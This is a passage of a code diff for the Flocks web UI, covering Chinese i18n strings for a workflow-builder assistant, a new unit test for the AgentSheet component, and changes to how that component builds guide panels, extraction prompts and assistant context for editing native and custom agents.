         "bullet1": "修改节点逻辑或执行代码",
         "bullet2": "调整分支条件、数据流转",
         "bullet3": "新增或删除节点",
         "bullet4": "重构整体流程结构",
         "tipPart1": "修改前请先在左侧",
-        "tipPart2": "tab 查看当前流程描述，整体描述清楚后提交修改意图，效果更好。",
+        "tipPart2": "tab 查看当前 workflow.md，整体意图清楚后提交修改需求，效果更好。",
         "retry": "重试"
       }
     }
@@ -312,17 +455,56 @@
     },
     "rightPanel": {
       "tabOverview": "详情",
-      "tabChat": "对话"
+      "tabChat": "工作台",
+      "tabIntegration": "发布"
     },
     "overview": {
-      "chatHint": "在「对话」标签页中描述您的需求，工作流生成后详情将自动填充",
+      "chatHint": "在「工作台」标签页中描述您的需求，工作流生成后详情将自动填充",
       "execDescription": "执行流程描述"
     },
+    "publish": {
+      "emptyTitle": "等待生成工作流",
+      "emptyHint": "工作流生成后，可以在这里配置 API、Syslog、Kafka、Webhook 或定时触发等发布方式。"
+    },
     "chat": {
       "sessionTitle": "新建工作流",
       "preparing": "正在准备工作流助手...",
       "inputPlaceholder": "描述您想创建的工作流... (Enter 发送)",
       "contextMessage": "用户希望创建一个 Flocks 工作流，请使用 workflow-builder skill 来完成。",
+      "emptyStateTitle": "暂无执行记录",
+      "guidePanelTitle": "Rex 辅助创建",
+      "guidePanelDesc": "选择一个引导或创建案例，Rex 会按 workflow-builder skill 先确认场景、输入输出、节点流程和样例，再生成文件。",
+      "generateEditDocPrompt": "这是用户点击「生成说明」触发的新任务。按钮含义是：先按 workflow-builder skill 生成 workflow.md 说明文件，确认后再由「生成工作流」基于 workflow.md 生成 workflow.json。\n\n请按下面流程推进：\n1. 先加载并遵守 workflow-builder skill。\n2. 必须使用 question 工具询问我需要中文流程说明文档还是英文流程说明文档；一次只问一个问题，必须允许自定义输入。\n3. 如果左侧编辑器已有内容，把它作为已有草稿参考；如果为空，就先通过 question 工具收集创建工作流所需的业务场景、输入、输出、触发方式、节点流程、样例和验收标准。\n4. 参考 workflow-builder skill 中的 workflow_zh.md / workflow_en.md 模板结构，只生成一份 workflow.md。\n5. workflow.md 要面向人编辑：说明功能、适用场景、输入输出、节点流程、可修改点、样例和验收方式。\n6. 写入 workflow.md 前先展示 diff 并等待我确认；确认后再写入新工作流目录下的 workflow.md。\n7. 完成后提醒我可以点击「生成工作流」基于 workflow.md 生成 workflow.json。\n\n当前左侧编辑器内容：\n~~~markdown\n{{editDocContent}}\n~~~",
+      "generateWorkflowPrompt": "用户点击了「生成工作流」按钮。这个按钮的意思是：基于当前左侧编辑器里的 workflow.md 内容生成正式 Flocks 工作流，其中核心产物是 workflow.json。\n\n请按 workflow-builder skill 推进：\n1. 先读取并遵守 workflow-builder skill。\n2. 以下方 workflow.md 内容作为主要意图来源，不要把任务理解成重写 workflow.md。\n3. 若还没有工作流目录，请先根据 workflow.md 确认/生成合适的工作流 ID 和目录，再写入 workflow.md 与 workflow.json；若已有目录，则读取现有 workflow.json 并基于 workflow.md 更新机器定义。\n4. 生成的 workflow.json 必须是合法 JSON，节点和边必须组成完整流程图。\n5. 写 workflow.json 前必须展示 diff 并等待我确认。\n6. 完成后说明 workflow.json 改了什么，以及应该如何测试。\n\n当前编辑器中的 workflow.md 内容：\n~~~markdown\n{{editDocContent}}\n~~~",
+      "guideSectionTitle": "创建引导",
+      "caseSectionTitle": "创建案例",
+      "guideActions": [
+        {
+          "label": "如何创建工作流",
+          "description": "从零开始梳理业务目标、输入输出、节点流程、样例和生成步骤。",
+          "prompt": "请按 workflow-builder skill 引导我从零创建一个 Flocks 工作流。先不要写文件，先用 question 工具一次只问一个最关键问题，帮我明确业务场景、触发方式、输入输出、需要调用的工具/API、节点步骤、分支条件、样例数据和验收标准；等我确认后，必须先生成并写入 workflow.md，让我通过左侧编辑器或 diff 确认，再基于已确认的 workflow.md 生成完整 workflow.json 并进入测试流程。"
+        },
+        {
+          "label": "功能需求描述",
+          "description": "帮我把一句模糊需求整理成可生成 workflow.md 的结构化需求。",
+          "prompt": "请帮我把工作流功能需求描述清楚，目标是形成可用于生成 workflow.md 和 workflow.json 的结构化说明。请先用 question 工具一次只问一个问题，收集：这个工作流解决什么问题、输入是什么、输出是什么、使用者是谁、是否自动触发、需要哪些工具或服务、有哪些异常和边界情况、最终如何验证成功。"
+        },
+        {
+          "label": "设计节点流程",
+          "description": "把需求拆成节点、边、分支、循环和样例数据确认清单。",
+          "prompt": "请根据 workflow-builder skill 帮我设计工作流节点流程。请先确认我的业务目标和输入输出，然后输出思考维度、节点清单、边关系、分支/循环逻辑、异常处理和 Mermaid 流程简图；在我确认前不要写 workflow.json。"
+        },
+        {
+          "label": "编辑工作流节点",
+          "description": "用于已有草稿或生成后的工作流，调整节点职责、输入输出、代码或连接关系。",
+          "prompt": "请帮我编辑工作流节点。请先读取当前创建页左侧 workflow.md 草稿和已有 workflow.json（如果存在），然后用 question 工具确认我要修改哪个节点、修改目标、输入输出变化、是否影响上下游边关系和样例数据；修改前先给出计划和 diff，不要直接写文件。"
+        },
+        {
+          "label": "准备样例输入",
+          "description": "根据场景生成或校验一条样例输入，用于后续逐节点测试。",
+          "prompt": "请按 workflow-builder skill 帮我准备工作流样例输入。先确认工作流接收的数据格式和关键字段；如果我没有样例，请先构造一条最小可用 JSON 样例并用 question 工具让我确认；样例确认后再用于后续节点测试和集成测试。"
+        }
+      ],
       "welcomeMessage": "你好！我是工作流创建助手 🚀\n\n请描述您想要创建的工作流，例如：\n\n- **情报查询类**：IP / 域名 / 文件哈希 威胁情报查询\n- **数据处理类**：多源数据采集、清洗、关联分析\n- **自动化响应类**：安全告警处理、事件响应流程\n\n描述越详细，生成的工作流越准确。您也可以点击下方的示例问题快速开始！",
       "exampleQuestions": [
         "帮我创建一个 IP 威胁情报查询工作流，输入 IP 地址，查询多个情报源并汇总生成报告",
@@ -330,6 +512,13 @@
         "设计一个文件哈希检测工作流，通过多个威胁情报平台对哈希值进行交叉验证",
         "建立一个钓鱼网站检测工作流，分析 URL 特征、页面内容和 SSL 证书信息",
         "创建一个安全事件响应工作流，自动收集、关联并分析安全告警，生成处置建议"
+      ],
+      "exampleQuestionLabels": [
+        "创建 IP 情报工作流",
+        "创建域名分析工作流",
+        "创建文件哈希工作流",
+        "创建钓鱼检测工作流",
+        "创建事件响应工作流"
       ]
     }
   },
diff --git a/webui/src/pages/Agent/AgentSheet.test.tsx b/webui/src/pages/Agent/AgentSheet.test.tsx
new file mode 100644
index 000000000..8c53b7e91
--- /dev/null
+++ b/webui/src/pages/Agent/AgentSheet.test.tsx
@@ -0,0 +1,287 @@
+import { render } from '@testing-library/react';
+import { describe, expect, it, vi, beforeEach } from 'vitest';
+
+import AgentSheet from './AgentSheet';
+import type { Agent } from '@/api/agent';
+
+const {
+  capturedEntitySheetProps,
+  mockUseRexComposerControls,
+  mockProviderList,
+  mockDefaultModelGetResolved,
+  mockModelListDefinitions,
+  mockToolList,
+  mockSkillList,
+} = vi.hoisted(() => ({ // built with vi.hoisted so the vi.mock factories in this file can reference them
+  capturedEntitySheetProps: [] as any[], // the mocked EntitySheet pushes its props here on every render
+  mockUseRexComposerControls: vi.fn(),
+  mockProviderList: vi.fn(),
+  mockDefaultModelGetResolved: vi.fn(),
+  mockModelListDefinitions: vi.fn(),
+  mockToolList: vi.fn(),
+  mockSkillList: vi.fn(),
+}));
+
+vi.mock('@/components/common/EntitySheet', () => ({
+  default: (props: any) => { // stand-in component: records the props it receives and renders only the guide panel title
+    capturedEntitySheetProps.push(props);
+    return <div data-testid="entity-sheet">{props.rexGuidePanelTitle}</div>;
+  },
+  useEntitySheet: () => ({ // stub hook returning fresh no-op openRex/openTest mocks
+    openRex: vi.fn(),
+    openTest: vi.fn(),
+  }),
+}));
+
+vi.mock('@/components/common/useRexComposerControls', () => ({
+  useRexComposerControls: mockUseRexComposerControls, // return value is configured in beforeEach
+}));
+
+vi.mock('@/api/provider', () => ({
+  providerAPI: { list: mockProviderList }, // resolved value is configured in beforeEach
+  defaultModelAPI: { getResolved: mockDefaultModelGetResolved },
+  modelV2API: { listDefinitions: mockModelListDefinitions },
+}));
+
+vi.mock('@/api/tool', () => ({
+  toolAPI: { list: mockToolList },
+}));
+
+vi.mock('@/api/skill', () => ({
+  skillAPI: { list: mockSkillList },
+}));
+
+vi.mock('@/api/agent', () => ({
+  agentAPI: { // bare stubs: never configured or asserted on in this file
+    update: vi.fn(),
+    updateModel: vi.fn(),
+  },
+}));
+
+vi.mock('@/api/session', () => ({
+  sessionApi: {
+    getMessages: vi.fn(),
+  },
+}));
+
+vi.mock('@/api/client', () => ({
+  default: {
+    post: vi.fn(),
+  },
+}));
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string, params?: Record<string, unknown>) => { // fake translator backed by the fixed table below
+      const translations: Record<string, unknown> = { // rebuilt per call so `params.name` can be interpolated into the edit prompts
+        'create.guideSectionTitle': '创建引导',
+        'create.caseSectionTitle': '创建案例',
+        'create.guideActions': [
+          {
+            label: '如何创建子 Agent',
+            description: '创建说明',
+            prompt: '创建子 Agent',
+          },
+        ],
+        'create.caseActions': [],
+        'create.guidePanelTitle': 'Rex 辅助创建',
+        'create.guidePanelDesc': '创建描述',
+        'create.emptyStateTitle': '暂无创建对话',
+        'edit.guideSectionTitle': '编辑引导',
+        'edit.caseSectionTitle': '编辑案例',
+        'edit.guideActions': [
+          {
+            label: '优化当前 Agent',
+            description: '审视当前配置',
+            prompt: `编辑 ${String(params?.name ?? '')}`,
+          },
+          {
+            label: '验证效果',
+            description: '设计测试输入',
+            prompt: `验证 ${String(params?.name ?? '')}`,
+          },
+        ],
+        'edit.caseActions': [
+          {
+            label: '变得更保守',
+            description: '降低风险',
+            prompt: `保守 ${String(params?.name ?? '')}`,
+          },
+        ],
+        'edit.guidePanelTitle': 'Rex 辅助修改',
+        'edit.guidePanelDesc': '编辑描述',
+        'edit.nativeGuidePanelDesc': '内置编辑描述',
+        'edit.nativeGuideActions': [
+          {
+            label: '检查模型策略',
+            description: '检查模型',
+            prompt: `模型 ${String(params?.name ?? '')}`,
+          },
+          {
+            label: '调整温度',
+            description: '调整温度',
+            prompt: `温度 ${String(params?.name ?? '')}`,
+          },
+        ],
+        'edit.nativeCaseActions': [
+          {
+            label: '提升响应效率',
+            description: '提升效率',
+            prompt: `效率 ${String(params?.name ?? '')}`,
+          },
+        ],
+        'edit.emptyStateTitle': '暂无编辑对话',
+        'common:entity.defaultTestPrompt': '你好，请介绍一下你自己以及你的主要功能。',
+        'sheet.done': '完成',
+      };
+      const fallback = params?.defaultValue; // only used when the key is missing from the table
+      return translations[key] ?? (typeof fallback === 'string' ? fallback : key); // table entry (string or array), else a string defaultValue, else the key itself
+    },
+  }),
+}));
+
+function makeAgent(overrides: Partial<Agent> = {}): Agent {
+  const defaults: Agent = { // baseline fixture: a non-native subagent
+    name: 'audit-agent',
+    nameCn: '审计 Agent',
+    description: 'Reviews code changes',
+    descriptionCn: '审计代码变更',
+    mode: 'subagent',
+    native: false,
+    permission: [],
+    prompt: 'Review code safely.',
+    temperature: 0.3,
+    options: {},
+    tools: ['query_ioc'],
+    skills: ['agent-builder'],
+  };
+  return { ...defaults, ...overrides }; // caller-supplied fields replace the defaults
+}
+
+describe('AgentSheet', () => {
+  beforeEach(() => {
+    capturedEntitySheetProps.length = 0; // clear in place: the mocked EntitySheet pushes into this same array
+    mockUseRexComposerControls.mockReturnValue({ // canned composer controls returned by the mocked hook
+      rexAgentName: 'rex',
+      rexMentionAgents: [{ name: 'rex' }],
+      rexModel: { providerID: 'minimax', modelID: 'minimax-m3' },
+      rexSupportsVision: false,
+      rexContextWindowTokens: 8192,
+    });
+    mockProviderList.mockResolvedValue({ data: { connected: [], all: [] } }); // every API mock below resolves to an empty payload
+    mockDefaultModelGetResolved.mockResolvedValue({ data: {} });
+    mockModelListDefinitions.mockResolvedValue({ data: { models: [] } });
+    mockToolList.mockResolvedValue({ data: [] });
+    mockSkillList.mockResolvedValue({ data: [] });
+  });
+
+  it('uses an edit guide experience without a separate test tab when editing an agent', () => { // non-native agent from makeAgent() defaults
+    render(
+      <AgentSheet
+        agent={makeAgent()}
+        onClose={vi.fn()}
+        onSaved={vi.fn()}
+      />,
+    );
+
+    const props = capturedEntitySheetProps.at(-1); // props from the most recent render of the mocked EntitySheet
+    expect(props.mode).toBe('edit');
+    expect(props.initialTab).toBe('rex');
+    expect(props.hideForm).toBe(false);
+    expect(props.rexSessionStorageKey).toBe('agent-edit:audit-agent');
+    expect(props.rexGuidePanelTitle).toBe('Rex 辅助修改');
+    expect(props.rexGuidePanelDesc).toBe('编辑描述');
+    expect(props.rexGuideEmptyTitle).toBe('暂无编辑对话');
+    expect(props.rexGuideGroups).toEqual([ // each expected action also carries its section title under `group`
+      {
+        title: '编辑引导',
+        actions: [
+          {
+            label: '优化当前 Agent',
+            description: '审视当前配置',
+            prompt: '编辑 audit-agent',
+            group: '编辑引导',
+          },
+          {
+            label: '验证效果',
+            description: '设计测试输入',
+            prompt: '验证 audit-agent',
+            group: '编辑引导',
+          },
+        ],
+      },
+      {
+        title: '编辑案例',
+        actions: [
+          {
+            label: '变得更保守',
+            description: '降低风险',
+            prompt: '保守 audit-agent',
+            group: '编辑案例',
+          },
+        ],
+      },
+    ]);
+    expect(props.rexAgentName).toBe('rex'); // value comes from the mocked useRexComposerControls
+    expect(props.onExtractFromRex).toEqual(expect.any(Function));
+    expect(props.onRunTest).toBeUndefined(); // no run-test handler or default test prompt is passed any more
+    expect(props.defaultTestPrompt).toBeUndefined();
+    expect(props.rexSystemContext).toContain('Agent 编辑引导助手');
+    expect(props.rexSystemContext).toContain('Tools：query_ioc');
+    expect(props.rexSystemContext).toContain('Skills：agent-builder');
+  });
+
+  it('uses a model and temperature guide when editing a native agent', () => { // same flow with native: true
+    render(
+      <AgentSheet
+        agent={makeAgent({
+          name: 'device-inspector',
+          native: true,
+          model: { providerID: 'minimax', modelID: 'minimax-m3' },
+          tools: ['device_query'],
+          skills: ['agent-builder'],
+        })}
+        onClose={vi.fn()}
+        onSaved={vi.fn()}
+      />,
+    );
+
+    const props = capturedEntitySheetProps.at(-1); // props from the most recent render of the mocked EntitySheet
+    expect(props.mode).toBe('edit');
+    expect(props.initialTab).toBe('rex');
+    expect(props.rexGuidePanelDesc).toBe('内置编辑描述');
+    expect(props.rexGuideGroups).toEqual([ // labels and prompts match the mocked edit.native* translation entries
+      {
+        title: '编辑引导',
+        actions: [
+          {
+            label: '检查模型策略',
+            description: '检查模型',
+            prompt: '模型 device-inspector',
+            group: '编辑引导',
+          },
+          {
+            label: '调整温度',
+            description: '调整温度',
+            prompt: '温度 device-inspector',
+            group: '编辑引导',
+          },
+        ],
+      },
+      {
+        title: '编辑案例',
+        actions: [
+          {
+            label: '提升响应效率',
+            description: '提升效率',
+            prompt: '效率 device-inspector',
+            group: '编辑案例',
+          },
+        ],
+      },
+    ]);
+    expect(props.rexSystemContext).toContain('只能保存模型和温度'); // context and welcome text must both state that only model and temperature can be saved
+    expect(props.rexSystemContext).toContain('不要建议提取或覆盖这些字段');
+    expect(props.rexWelcomeMessage).toContain('当前只支持保存模型和温度');
+  });
+});
diff --git a/webui/src/pages/Agent/AgentSheet.tsx b/webui/src/pages/Agent/AgentSheet.tsx
index e768f0768..14ce447a6 100644
--- a/webui/src/pages/Agent/AgentSheet.tsx
+++ b/webui/src/pages/Agent/AgentSheet.tsx
@@ -5,16 +5,18 @@
  * 合并为单一的 EntitySheet 封装，支持：
  * - 表单模式（直接填写字段：名称、描述、System Prompt、模型、温度、Tools、Skills）
  * - Rex 对话模式（自然语言描述 → 一键提取配置到表单）
- * - 测试模式（在编辑时直接向 Agent 发消息验证效果）
+ * - 工作台模式（通过引导卡片让 Rex 协助创建、编辑和验证配置）
  */
 
-import { useState, useEffect } from 'react';
+import { useState, useEffect, useMemo } from 'react';
 import { Bot, Sparkles, Lock } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import { agentAPI, Agent } from '@/api/agent';
 import { sessionApi } from '@/api/session';
 import client from '@/api/client';
 import EntitySheet, { useEntitySheet } from '@/components/common/EntitySheet';
+import { buildGuidedCreateGroups } from '@/components/common/GuidedCreatePanel';
+import { useRexComposerControls } from '@/components/common/useRexComposerControls';
 import PillGroup from '@/components/common/PillGroup';
 import { providerAPI, defaultModelAPI, modelV2API } from '@/api/provider';
 import { toolAPI, Tool } from '@/api/tool';
@@ -55,8 +57,9 @@ interface AgentSheetProps {
 }
 
 export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps) {
-  const { t } = useTranslation('agent');
+  const { t } = useTranslation(['agent', 'common']);
   const isEdit = !!agent;
+  const isNative = !!agent?.native;
 
   const [formData, setFormData] = useState<AgentFormData>({
     name: agent?.name ?? '',
@@ -78,6 +81,34 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
   const [allSkills, setAllSkills] = useState<Skill[]>([]);
   const [toolsLoading, setToolsLoading] = useState(true);
   const [skillsLoading, setSkillsLoading] = useState(true);
+  const createGuideGroups = useMemo(() => buildGuidedCreateGroups([
+    { title: t('create.guideSectionTitle'), actions: t('create.guideActions', { returnObjects: true }) },
+    { title: t('create.caseSectionTitle'), actions: t('create.caseActions', { returnObjects: true }) },
+  ]), [t]);
+  const editGuideGroups = useMemo(() => {
+    const guideActionKey = isNative ? 'edit.nativeGuideActions' : 'edit.guideActions';
+    const caseActionKey = isNative ? 'edit.nativeCaseActions' : 'edit.caseActions';
+    const name = formData.name || agent?.name || 'Agent';
+
+    return buildGuidedCreateGroups([
+      {
+        title: t('edit.guideSectionTitle'),
+        actions: t(guideActionKey, {
+          returnObjects: true,
+          name,
+        }),
+      },
+      {
+        title: t('edit.caseSectionTitle'),
+        actions: t(caseActionKey, {
+          returnObjects: true,
+          name,
+        }),
+      },
+    ]);
+  }, [agent?.name, formData.name, isNative, t]);
+  const guideGroups = isEdit ? editGuideGroups : createGuideGroups;
+  const rexComposerControls = useRexComposerControls();
 
   // isPrimary derives from formData.mode so it reacts to mode changes in create mode
   const isPrimary = formData.mode === 'primary';
@@ -141,7 +172,6 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
     }
   }, [availableModels, formData.modelKey, modelsLoaded]);
 
-  const isNative = !!agent?.native;
   const submitDisabled = false;
 
   const handleSubmit = async () => {
@@ -184,25 +214,36 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
     }
   };
 
-  // ── Test: run agent with a prompt ─────────────────────────────────────────
-
-  const handleRunTest = async (prompt: string): Promise<string> => {
-    const res = await agentAPI.test(agent!.name, prompt);
-    return res.data.sessionId;
-  };
-
   // ── Rex: extract config from conversation ─────────────────────────────────
 
   const handleExtractFromRex = async (sessionId: string) => {
-    const extractPrompt = `请将以上讨论的 Agent 配置整理输出为 JSON，只输出 JSON 对象，不要有任何其他文字：
+    const extractPrompt = isNative
+      ? `请将以上讨论的内置 Agent 可保存配置整理输出为 JSON，只输出 JSON 对象，不要有任何其他文字。内置 Agent 只支持保存模型和温度，不要输出 description、prompt、tools、skills 等不可保存字段：
+\`\`\`json
+{
+  "model": {
+    "providerID": "模型 Provider ID（可选）",
+    "modelID": "模型 ID（可选）"
+  },
+  "temperature": 0.7
+}
+\`\`\``
+      : `请将以上讨论的 Agent 配置整理输出为 JSON，只输出 JSON 对象，不要有任何其他文字：
 \`\`\`json
 {
   "name": "agent-名称（小写字母、数字和连字符）",
+  "name_cn": "中文名称（可选）",
   "description": "简短英文描述（用于委派）",
   "description_cn": "中文界面展示（可选）",
   "prompt": "完整的 System Prompt 内容",
+  "model": {
+    "providerID": "模型 Provider ID（可选）",
+    "modelID": "模型 ID（可选）"
+  },
   "temperature": 0.7,
-  "mode": "primary 或 subagent"
+  "mode": "primary 或 subagent",
+  "tools": ["工具名称（可选）"],
+  "skills": ["Skill 名称（可选）"]
 }
 \`\`\``;
 
@@ -230,30 +271,49 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
 
           const config = parseJsonFromText(text);
           if (config) {
-            setFormData((prev) => ({
-              ...prev,  // preserve tools, skills, modelKey
-              name: config.name || prev.name,
-              nameCn:
-                (typeof config.name_cn === 'string'
-                  ? config.name_cn
-                  : typeof config.nameCn === 'string'
-                    ? config.nameCn
-                    : prev.nameCn),
-              description: config.description ?? prev.description,
-              descriptionCn:
-                (typeof config.description_cn === 'string'
-                  ? config.description_cn
-                  : typeof config.descriptionCn === 'string'
-                    ? config.descriptionCn
-                    : prev.descriptionCn),
-              prompt: config.prompt || prev.prompt,
-              temperature:
-                typeof config.temperature === 'number' ? config.temperature : prev.temperature,
-              mode:
-                config.mode === 'primary' || config.mode === 'subagent'
-                  ? config.mode
-                  : prev.mode,
-            }));
+            setFormData((prev) => {
+              const modelKey = getModelKeyFromConfig(config, prev.modelKey);
+              const temperature = typeof config.temperature === 'number' ? config.temperature : prev.temperature;
+
+              if (isNative) {
+                return {
+                  ...prev,
+                  modelKey,
+                  temperature,
+                };
+              }
+
+              return {
+                ...prev,
+                name: config.name || prev.name,
+                nameCn:
+                  (typeof config.name_cn === 'string'
+                    ? config.name_cn
+                    : typeof config.nameCn === 'string'
+                      ? config.nameCn
+                      : prev.nameCn),
+                description: config.description ?? prev.description,
+                descriptionCn:
+                  (typeof config.description_cn === 'string'
+                    ? config.description_cn
+                    : typeof config.descriptionCn === 'string'
+                      ? config.descriptionCn
+                      : prev.descriptionCn),
+                prompt: config.prompt || prev.prompt,
+                modelKey,
+                temperature,
+                mode:
+                  config.mode === 'primary' || config.mode === 'subagent'
+                    ? config.mode
+                    : prev.mode,
+                tools: Array.isArray(config.tools)
+                  ? config.tools.filter((tool: unknown): tool is string => typeof tool === 'string')
+                  : prev.tools,
+                skills: Array.isArray(config.skills)
+                  ? config.skills.filter((skill: unknown): skill is string => typeof skill === 'string')
+                  : prev.skills,
+              };
+            });
             return;
           }
         }
@@ -270,8 +330,18 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
       entityType="Agent"
       entityName={agent?.name}
       icon={<Bot className="w-5 h-5" />}
-      rexSystemContext={buildRexContext(formData, isEdit)}
-      rexWelcomeMessage={buildRexWelcome(isEdit, agent?.name)}
+      rexSystemContext={buildRexContext(formData, isEdit, isNative)}
+      rexWelcomeMessage={buildRexWelcome(isEdit, agent?.name, isNative)}
+      rexGuideGroups={guideGroups}
+      rexGuidePanelTitle={isEdit ? t('edit.guidePanelTitle') : t('create.guidePanelTitle')}
+      rexGuidePanelDesc={isEdit
+        ? t(isNative ? 'edit.nativeGuidePanelDesc' : 'edit.guidePanelDesc', { name: agent?.name ?? formData.name })
+        : t('create.guidePanelDesc')}
+      rexGuideEmptyTitle={isEdit ? t('edit.emptyStateTitle') : t('create.emptyStateTitle')}
+      rexGuideIcon={<Bot className="h-5 w-5" />}
+      initialTab={isEdit ? 'rex' : undefined}
+      rexSessionStorageKey={isEdit && agent?.name ? `agent-edit:${agent.name}` : undefined}
+      {...rexComposerControls}
       submitDisabled={submitDisabled}
       submitLoading={loading}
       submitLabel={isEdit ? undefined : t('sheet.done')}
@@ -279,8 +349,6 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
       onClose={onClose}
       onSubmit={handleSubmit}
       onExtractFromRex={isEdit ? handleExtractFromRex : undefined}
-      onRunTest={isEdit ? handleRunTest : undefined}
-      defaultTestPrompt="你好，请介绍一下你自己以及你的主要功能。"
     >
       <AgentFormContent
         formData={formData}
@@ -697,22 +765,24 @@ function AgentFormContent({
 
 // ─── Rex context builders ─────────────────────────────────────────────────────
 
-function buildRexContext(formData: AgentFormData, isEdit: boolean): string {
+function buildRexContext(formData: AgentFormData, isEdit: boolean, isNative = false): string {
   if (!isEdit) {
     return `你是 Agent 创建助手。用户希望通过对话来创建一个新的子 Agent。
 
-请使用 agent-builder skill 根据用户的需求生成子 Agent 配置文件（YAML + prompt 文件），保存到 ~/.flocks/plugins/agents/ 目录。
+请先加载并遵守项目内 .flocks/plugins/skills/agent-builder（agent-builder skill），再根据用户需求生成子 Agent 配置文件（agent.yaml + prompt.md），保存到 ~/.flocks/plugins/agents/<name>/ 目录。
 
 **创建流程：**
 1. 先确认用户需求：Agent 名称、职责、能力边界、执行模式
-2. 生成 prompt 文件（.prompt.md）和配置文件（.yaml）
-3. 验证文件正确性
+2. 生成 prompt.md 和 agent.yaml，目录名必须与 Agent name 一致
+3. 验证 YAML、目录结构、名称唯一性和工具名
 
 **重要约束：**
+- 必须先加载 .flocks/plugins/skills/agent-builder
 - Agent 名称必须是 kebab-case 格式
 - 如果用户提供中文名称，请写入 name_cn 字段
 - mode 固定为 subagent
-- 文件必须写入 ~/.flocks/plugins/agents/
+- 文件必须写入 ~/.flocks/plugins/agents/<name>/，禁止创建 agents/<name>.yaml 这类扁平文件
+- 新 Agent 优先使用 tools: allowlist，不要随意使用 permission 通配规则
 - 不要与内置 Agent 名称冲突
 
 请先引导用户描述需求，如果信息不够清晰可适当追问，然后一次性生成所有文件。`;
@@ -722,41 +792,81 @@ function buildRexContext(formData: AgentFormData, isEdit: boolean): string {
     formData.prompt.length > 200
       ? formData.prompt.slice(0, 200) + '...'
       : formData.prompt;
+  const toolsSummary = formData.tools.length > 0 ? formData.tools.join(', ') : '（未配置）';
+  const skillsSummary = formData.skills.length > 0 ? formData.skills.join(', ') : '（未配置）';
+  const modelSummary = formData.modelKey || '（系统默认）';
+  const editableFieldLines = isNative
+    ? [
+        `**可保存字段说明：**`,
+        `- **模型**：可建议切换到更适合当前职责的模型，但需要给出 Provider ID 和 Model ID 才能自动提取。`,
+        `- **温度**：0-2，值越低越精准保守（安全分析推荐 0.2-0.5），越高越有创意。`,
+        `- **验证建议**：可以设计测试输入、预期输出和失败判据，帮助用户保存后验证效果。`,
+        `- 内置 Agent 的描述、System Prompt、Tools、Skills 由系统维护，不要建议提取或覆盖这些字段。`,
+      ]
+    : [
+        `**可编辑字段说明：**`,
+        `- **描述**：简短说明 Agent 的用途，英文描述用于委派和模型上下文。`,
+        `- **System Prompt**：Agent 的核心指令，决定其行为、能力边界、输出格式和风格。`,
+        `- **模型 / 温度**：模型决定能力边界；温度 0-2，值越低越精准保守，越高越有创意。`,
+        `- **Tools / Skills**：只保留任务确实需要的能力，优先使用最小权限。`,
+        `- **模式**：仅展示当前类型；编辑时不要建议修改 primary/subagent 模式。`,
+      ];
 
   return [
-    `你是一个 Agent 配置专家，正在帮助用户修改一个 AI Agent。`,
+    `你是一个 Agent 编辑引导助手，正在帮助用户修改一个已有 AI Agent。`,
+    `你的目标不是直接大改配置，而是先理解当前配置、追问修改意图，再给出可应用到表单的修改方案。`,
+    isNative
+      ? `这是内置 Agent：只能保存模型和温度。若用户要求修改职责、Prompt、Tools 或 Skills，请明确说明这些字段当前不可保存，只能给出验证建议或外部配置建议。`
+      : `如果用户希望改动 Agent 文件或重新生成 prompt.md/agent.yaml，请先加载并遵守项目内 .flocks/plugins/skills/agent-builder（agent-builder skill）。`,
     ``,
     `**当前配置状态：**`,
     `- 名称：${formData.name || '（未填写）'}`,
     `- 描述（英文）：${formData.description || '（未填写）'}`,
     `- 描述（中文）：${formData.descriptionCn || '（未填写）'}`,
     `- System Prompt：${promptPreview || '（未填写）'}`,
+    `- 模型：${modelSummary}`,
     `- 温度：${formData.temperature}`,
     `- 模式：${formData.mode === 'primary' ? 'Primary（主 Agent）' : 'Subagent（子 Agent）'}`,
+    `- Tools：${toolsSummary}`,
+    `- Skills：${skillsSummary}`,
+    `- 是否内置 Agent：${isNative ? '是。内置 Agent 仅支持修改模型和温度，其他配置由系统维护。' : '否，可修改描述、Prompt、温度、Tools 和 Skills。'}`,
     ``,
-    `**Agent 字段说明：**`,
-    `- **名称**：小写字母、数字和连字符，是 Agent 的唯一标识符`,
-    `- **描述**：简短说明 Agent 的用途（30字以内）`,
-    `- **System Prompt**：Agent 的核心指令，决定其行为、能力和风格`,
-    `- **温度**：0-2，值越低越精准保守（安全分析推荐 0.2-0.5），越高越有创意`,
-    `- **模式**：primary 直接与用户交互；subagent 由主 Agent 调用`,
+    `**编辑流程：**`,
+    `1. 先确认用户想解决的问题：职责变更、行为风格、工具权限、输出格式或模型参数。`,
+    `2. 对照当前配置说明建议修改哪些字段，并指出不建议修改的边界。`,
+    `3. 必要时一次只问一个关键问题，避免一开始就输出大段配置。`,
+    `4. 用户确认后，输出可被「从 Rex 提取配置」解析的 JSON 配置摘要。`,
     ``,
-    `请根据用户的描述帮助他们修改 Agent 配置。`,
-    `配置完成后，用户可以点击「从 Rex 提取配置」按钮，将配置自动填入表单。`,
-    `届时你会被要求以 JSON 格式输出配置摘要，请确保 JSON 格式正确。`,
+    ...editableFieldLines,
+    ``,
+    `配置完成后，用户会点击引导按钮「从 Rex 提取配置」，将配置自动填入表单。届时你会被要求只输出 JSON，请确保 JSON 格式正确。`,
   ].join('\n');
 }
 
-function buildRexWelcome(isEdit: boolean, agentName?: string): string {
+function buildRexWelcome(isEdit: boolean, agentName?: string, isNative = false): string {
   if (isEdit) {
+    if (isNative) {
+      return `你好！我来帮你修改内置 Agent **${agentName}** 的可保存配置。
+
+你可以从下方选择一个编辑入口，也可以直接描述你想调整的地方，比如：
+
+- 检查当前模型是否适合这个 Agent
+- 调低温度，让输出更稳定保守
+- 设计测试输入和验收标准
+
+注意：这是内置 Agent，当前只支持保存模型和温度。`;
+    }
+
     return `你好！我来帮你修改 Agent **${agentName}** 的配置。
 
-你可以告诉我：
-- 想调整 System Prompt 的哪些部分？
-- 需要改变 Agent 的行为风格？
-- 温度或其他参数需要调整？
+你可以从下方选择一个编辑入口，也可以直接描述你想改的地方，比如：
+
+- 调整职责边界或委派触发条件
